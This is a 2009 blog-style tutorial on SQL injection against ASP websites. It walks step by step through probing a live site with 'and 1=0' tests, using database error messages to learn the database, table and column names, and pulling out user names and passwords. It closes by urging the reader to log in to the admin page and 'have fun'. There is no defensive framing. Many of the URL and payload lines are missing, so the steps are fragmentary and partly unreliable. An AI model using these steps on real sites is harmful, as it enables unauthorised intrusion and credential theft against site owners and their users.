Dec 24, 2009

ASP SQL Injection

tep 1: find a site with asp, like ex.

step 2: add after 2 with space; and 1=0 OR and 1=1
so: and 1=0

By 1=0 you should get an error, or empty page like:

ADODB.Field error '80020009'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/default.asp, line 0

and with 1=1 you need to get a normal page.

step 3: add after the 2 without space (yes remove step 2 text) ;


then you should get an error like:

Microsoft OLE DB Provider for ODBC Drivers error '80040e37'

[MySQL][ODBC 3.51 Driver][mysqld-5.0.24-community-nt]Table 'ssk2006.cruz3n' doesn't exist

/inc/extra.asp, line 110

step 4: Then the database is:: ssk2006

step 5: (yes, remove everything after 2)


OR go ahead until you get an error like:

Type mismatch

So like this:


Until then you get this error:

The used SELECT statement......

step 6: Now we are almost done!!

step 7: Change from: to http://..../news.asp?id=-2
(i changed 2 to -2 .. saying this because some dont see it)

Then the name of the frame/title must change to a number. (7 here for example)

step 8: Then you make from that number what you see "table_name" (without quotes) instead of 7 and then you get the name: CHARACTERS_SETS.

step 9: then you put behind: (7 is changed by table_name because of that number)


the frame name changes to a table name like tblUsers.

put +limit+1,1 after the 'databasename' to check inside the tblUsers:


(ssk2006 is the database again)

Go ahead with counting up:


(or 3,1 of 4,1 ect ect)

until you get something with tblUser or something else with User. (Its still Type mismatch !)

step 10: tblUser is the table of the users!! yeah found

step 11: change




Then you get again a number (7 for example, with still Type mismatch!)

step 12: change the number to column_name ; so you get this:


Then you see something like iUserID (or ex. login)

step 13: change




Write everything down what you get; like;

iUserActive , sUserName,sPassword ect ect

with the method limit 1,1 keep making it higher : 2,1 - 3,1 - 4,1 etc

step 14: change




step 15: Now you have finished SQL injection

sUserName (ex: Cruz3N)
sUserEmail (ex:
sUserLogin (ex: Cruz3N)
sUserPassword (ex: Ganteng)

Now go to the admin login page, and have fun

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